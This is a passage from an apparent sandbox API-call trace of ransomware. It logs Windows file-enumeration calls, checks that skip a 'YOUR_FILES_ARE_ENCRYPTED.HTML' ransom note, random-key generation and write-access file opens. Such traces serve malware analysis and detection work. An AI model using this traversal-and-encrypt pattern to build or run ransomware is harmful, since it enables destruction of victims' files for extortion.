ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcbf1e0a0, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f31c0 [0169.957] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xd0e963b0, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xcbf1e0a0, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcbf1e0a0, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0169.957] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xd0f087d0, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xcbef7f40, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcbef7f40, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, 
cFileName="Applications", cAlternateFileName="APPLIC~1")) returned 1 [0169.957] GetProcessHeap () returned 0x270000 [0169.957] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x73f0050 [0169.958] lstrcpyW (in: lpString1=0x73f0050, lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft\\Search\\Data\\Applications" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Search\\Data\\Applications") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Search\\Data\\Applications" [0169.959] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Search\\Data\\Applications", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Search\\Data\\Applications\\*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Search\\Data\\Applications\\*" [0169.959] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Search\\Data\\Applications\\*", lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xd0f087d0, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xcbef7f40, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcbef7f40, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3200 [0169.959] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xd0f087d0, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xcbef7f40, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcbef7f40, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0169.960] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: 
lpFindFileData=0x4ebd53c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xd0f087d0, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd231e170, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0xd231e170, ftLastWriteTime.dwHighDateTime=0x1d70517, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="Windows", cAlternateFileName="")) returned 1 [0169.960] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xcbef7f40, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0xcbef7f40, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcbef7f40, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x0, dwReserved1=0x60, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 1 [0169.960] lstrcmpW (lpString1="YOUR_FILES_ARE_ENCRYPTED.HTML", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0 [0169.960] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xcbef7f40, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0xcbef7f40, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcbef7f40, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x0, dwReserved1=0x60, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 0 [0169.960] FindClose (in: hFindFile=0x42f3200 | out: hFindFile=0x42f3200) returned 1 [0169.960] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Search\\Data\\Applications\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\all users\\microsoft\\search\\data\\applications\\your_files_are_encrypted.html"), 
dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0169.960] GetProcessHeap () returned 0x270000 [0169.961] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x73f0050 | out: hHeap=0x270000) returned 1 [0169.961] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xd0ebc510, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xcbf1e0a0, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcbf1e0a0, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="Temp", cAlternateFileName="")) returned 1 [0169.961] GetProcessHeap () returned 0x270000 [0169.961] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x73f0050 [0169.961] lstrcpyW (in: lpString1=0x73f0050, lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft\\Search\\Data\\Temp" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Search\\Data\\Temp") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Search\\Data\\Temp" [0169.961] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Search\\Data\\Temp", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Search\\Data\\Temp\\*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Search\\Data\\Temp\\*" [0169.961] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Search\\Data\\Temp\\*", lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xd0ebc510, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xcbf1e0a0, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcbf1e0a0, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, 
dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3200 [0169.962] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xd0ebc510, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xcbf1e0a0, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcbf1e0a0, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0169.962] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xcbf1e0a0, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0xcbf1e0a0, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcbf1e0a0, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x0, dwReserved1=0x60, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 1 [0169.962] lstrcmpW (lpString1="YOUR_FILES_ARE_ENCRYPTED.HTML", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0 [0169.962] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xcbf1e0a0, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0xcbf1e0a0, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcbf1e0a0, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x0, dwReserved1=0x60, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 0 [0169.962] FindClose (in: hFindFile=0x42f3200 | out: hFindFile=0x42f3200) returned 1 [0169.962] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All 
Users\\Microsoft\\Search\\Data\\Temp\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\all users\\microsoft\\search\\data\\temp\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0169.962] GetProcessHeap () returned 0x270000 [0169.963] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x73f0050 | out: hHeap=0x270000) returned 1 [0169.963] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xcbf1e0a0, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0xcbf1e0a0, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcbf1e0a0, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x0, dwReserved1=0x60, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 1 [0169.963] lstrcmpW (lpString1="YOUR_FILES_ARE_ENCRYPTED.HTML", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0 [0169.963] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xcbf1e0a0, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0xcbf1e0a0, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcbf1e0a0, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x0, dwReserved1=0x60, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 0 [0169.963] FindClose (in: hFindFile=0x42f31c0 | out: hFindFile=0x42f31c0) returned 1 [0169.963] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Search\\Data\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\all 
users\\microsoft\\search\\data\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0169.963] GetProcessHeap () returned 0x270000 [0169.964] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x73e0048 | out: hHeap=0x270000) returned 1 [0169.964] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xcbf1e0a0, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0xcbf1e0a0, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcbf1e0a0, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x0, dwReserved1=0x60, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 1 [0169.964] lstrcmpW (lpString1="YOUR_FILES_ARE_ENCRYPTED.HTML", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0 [0169.964] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xcbf1e0a0, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0xcbf1e0a0, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcbf1e0a0, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x0, dwReserved1=0x60, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 0 [0169.964] FindClose (in: hFindFile=0x42f3180 | out: hFindFile=0x42f3180) returned 1 [0169.964] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Search\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\all users\\microsoft\\search\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, 
dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0169.964] GetProcessHeap () returned 0x270000 [0169.965] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74fa168 | out: hHeap=0x270000) returned 1 [0169.965] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xf9f55fb4, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xcbf904c0, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcbf904c0, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="User Account Pictures", cAlternateFileName="USERAC~1")) returned 1 [0169.965] GetProcessHeap () returned 0x270000 [0169.965] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x74fa168 [0169.965] lstrcpyW (in: lpString1=0x74fa168, lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures" [0169.965] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\*" [0169.965] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\*", lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xf9f55fb4, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xcbf904c0, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcbf904c0, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) 
returned 0x42f3180 [0169.966] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xf9f55fb4, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xcbf904c0, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcbf904c0, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0169.966] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xd282d030, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd282d030, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0xd282d030, ftLastWriteTime.dwHighDateTime=0x1d70517, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="5AlR3U30D3.dat", cAlternateFileName="5ALR3U~1.DAT")) returned 1 [0169.966] lstrcmpW (lpString1="5AlR3U30D3.dat", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0169.966] PathFindExtensionW (pszPath="5AlR3U30D3.dat") returned=".dat" [0169.966] lstrlenW (lpString=".dat") returned 4 [0169.966] PathFindExtensionW (pszPath="5AlR3U30D3.dat") returned=".dat" [0169.966] SystemFunction036 (in: RandomBuffer=0x4ebdaf8, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebdaf8) returned 1 [0169.966] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\5AlR3U30D3.dat" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\5alr3u30d3.dat"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x5fc [0169.967] GetFileSizeEx (in: hFile=0x5fc, lpFileSize=0x4ebdb1c | out: lpFileSize=0x4ebdb1c*=0) returned 1 [0169.967] CloseHandle (hObject=0x5fc) 
returned 1 [0169.967] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe4eb893d, ftCreationTime.dwHighDateTime=0x1ca043e, ftLastAccessTime.dwLowDateTime=0xcbf6a360, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcbf6a360, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="Default Pictures", cAlternateFileName="DEFAUL~1")) returned 1 [0169.967] wnsprintfW (in: pszDest=0x74fa168, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures") returned 71 [0169.967] GetProcessHeap () returned 0x270000 [0169.967] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x73e0048 [0169.967] lstrcpyW (in: lpString1=0x73e0048, lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures" [0169.967] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\*" [0169.967] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\*", lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe4eb893d, ftCreationTime.dwHighDateTime=0x1ca043e, ftLastAccessTime.dwLowDateTime=0xcbf6a360, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcbf6a360, ftLastWriteTime.dwHighDateTime=0x1d7fb46, 
nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x42f31c0 [0169.967] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe4eb893d, ftCreationTime.dwHighDateTime=0x1ca043e, ftLastAccessTime.dwLowDateTime=0xcbf6a360, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcbf6a360, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0169.967] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5270cf0e, ftCreationTime.dwHighDateTime=0x1ca0408, ftLastAccessTime.dwLowDateTime=0x5270cf0e, ftLastAccessTime.dwHighDateTime=0x1ca0408, ftLastWriteTime.dwLowDateTime=0xf171085c, ftLastWriteTime.dwHighDateTime=0x1c9ea10, nFileSizeHigh=0x0, nFileSizeLow=0xc038, dwReserved0=0x0, dwReserved1=0x0, cFileName="usertile10.bmp", cAlternateFileName="")) returned 1 [0169.968] wnsprintfW (in: pszDest=0x73e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile10.bmp") returned 86 [0169.968] lstrcmpW (lpString1="usertile10.bmp", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0169.968] PathFindExtensionW (pszPath="usertile10.bmp") returned=".bmp" [0169.968] lstrlenW (lpString=".bmp") returned 4 [0169.968] PathFindExtensionW (pszPath="usertile10.bmp") returned=".bmp" [0169.968] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5270cf0e, ftCreationTime.dwHighDateTime=0x1ca0408, ftLastAccessTime.dwLowDateTime=0x5270cf0e, ftLastAccessTime.dwHighDateTime=0x1ca0408, 
ftLastWriteTime.dwLowDateTime=0xf17369bc, ftLastWriteTime.dwHighDateTime=0x1c9ea10, nFileSizeHigh=0x0, nFileSizeLow=0xc038, dwReserved0=0x0, dwReserved1=0x0, cFileName="usertile11.bmp", cAlternateFileName="")) returned 1 [0169.968] wnsprintfW (in: pszDest=0x73e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile11.bmp") returned 86 [0169.968] lstrcmpW (lpString1="usertile11.bmp", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0169.968] PathFindExtensionW (pszPath="usertile11.bmp") returned=".bmp" [0169.968] lstrlenW (lpString=".bmp") returned 4 [0169.968] PathFindExtensionW (pszPath="usertile11.bmp") returned=".bmp" [0169.968] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x52733076, ftCreationTime.dwHighDateTime=0x1ca0408, ftLastAccessTime.dwLowDateTime=0x52733076, ftLastAccessTime.dwHighDateTime=0x1ca0408, ftLastWriteTime.dwLowDateTime=0xf1c4587c, ftLastWriteTime.dwHighDateTime=0x1c9ea10, nFileSizeHigh=0x0, nFileSizeLow=0xc038, dwReserved0=0x0, dwReserved1=0x0, cFileName="usertile12.bmp", cAlternateFileName="")) returned 1 [0169.968] wnsprintfW (in: pszDest=0x73e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile12.bmp") returned 86 [0169.968] lstrcmpW (lpString1="usertile12.bmp", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0169.968] PathFindExtensionW (pszPath="usertile12.bmp") returned=".bmp" [0169.968] lstrlenW (lpString=".bmp") returned 4 [0169.968] PathFindExtensionW (pszPath="usertile12.bmp") returned=".bmp" [0169.968] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x527591de, ftCreationTime.dwHighDateTime=0x1ca0408, 
ftLastAccessTime.dwLowDateTime=0x527591de, ftLastAccessTime.dwHighDateTime=0x1ca0408, ftLastWriteTime.dwLowDateTime=0xf1c4587c, ftLastWriteTime.dwHighDateTime=0x1c9ea10, nFileSizeHigh=0x0, nFileSizeLow=0xbeb8, dwReserved0=0x0, dwReserved1=0x0, cFileName="usertile13.bmp", cAlternateFileName="")) returned 1 [0169.968] wnsprintfW (in: pszDest=0x73e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile13.bmp") returned 86 [0169.968] lstrcmpW (lpString1="usertile13.bmp", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0169.968] PathFindExtensionW (pszPath="usertile13.bmp") returned=".bmp" [0169.968] lstrlenW (lpString=".bmp") returned 4 [0169.969] PathFindExtensionW (pszPath="usertile13.bmp") returned=".bmp" [0169.969] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x527591de, ftCreationTime.dwHighDateTime=0x1ca0408, ftLastAccessTime.dwLowDateTime=0x527591de, ftLastAccessTime.dwHighDateTime=0x1ca0408, ftLastWriteTime.dwLowDateTime=0xf1e5abbc, ftLastWriteTime.dwHighDateTime=0x1c9ea10, nFileSizeHigh=0x0, nFileSizeLow=0xc038, dwReserved0=0x0, dwReserved1=0x0, cFileName="usertile14.bmp", cAlternateFileName="")) returned 1 [0169.969] wnsprintfW (in: pszDest=0x73e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile14.bmp") returned 86 [0169.969] lstrcmpW (lpString1="usertile14.bmp", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0169.969] PathFindExtensionW (pszPath="usertile14.bmp") returned=".bmp" [0169.969] lstrlenW (lpString=".bmp") returned 4 [0169.969] 